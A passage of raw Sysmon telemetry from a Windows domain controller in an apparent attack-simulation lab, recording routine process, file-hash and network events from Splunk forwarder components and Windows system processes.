Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.005{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FAEADC6371F9B6DC84E888A148BFD8F,SHA256=793F110AE9A669CB95271121220314F890043C17B2D8AD19D4D1FD51B7B1A91A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-708E-603D-6288-00000000AD01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-708E-603D-6288-00000000AD01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.942{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-708E-603D-6288-00000000AD01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.943{05ADC7E1-708E-603D-6288-00000000AD01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001695946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:58.515{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local52821- 10341000x80000000000000001695945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-708E-603D-6188-00000000AD01}7652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-708E-603D-6188-00000000AD01}7652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.273{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-708E-603D-6188-00000000AD01}7652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.271{05ADC7E1-708E-603D-6188-00000000AD01}7652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.130{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D2B64DBF7CEB4611B77CE3C2F2E53CF,SHA256=092F15ABAE229D8E942905823E3EBF7080603289E879CFF0462F4D84BCBDF99E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:06.020{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156F83190C086C7C5F1E92241D1D0101,SHA256=D17498FB9A2393B2FD994AF55C4007F86745BD1A2DEE6630822D61497D3BFF49,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:59.546{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local52821- 23542300x80000000000000001695957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:07.223{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91508CBC9FE71D1E3A81C4FE65194DB9,SHA256=7D89BB0E655BE979CC7A972E3A27BFEFE2D7E11FA433081013718F348FF16108,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:07.130{05ADC7E1-708E-603D-6288-00000000AD01}71286744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:07.036{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6289DA6E7C73793B5F7D47924B9BD27,SHA256=A4002C3B459DFFF5E81F304F0D2C682C01709E829E938A5D2CB045EECCFEE759,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:00.485{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55137-false10.0.1.12-8000- 23542300x80000000000000001695959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:08.051{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F1D1E1E42BB62D89BBFC2FB803447E1,SHA256=9D568AAB1F2224095AE7C8A39FAE9F268E1B33C6F52379E5F4F166C186343F9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.573{05ADC7E1-7091-603D-6388-00000000AD01}81083304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.395{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7091-603D-6388-00000000AD01}8108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 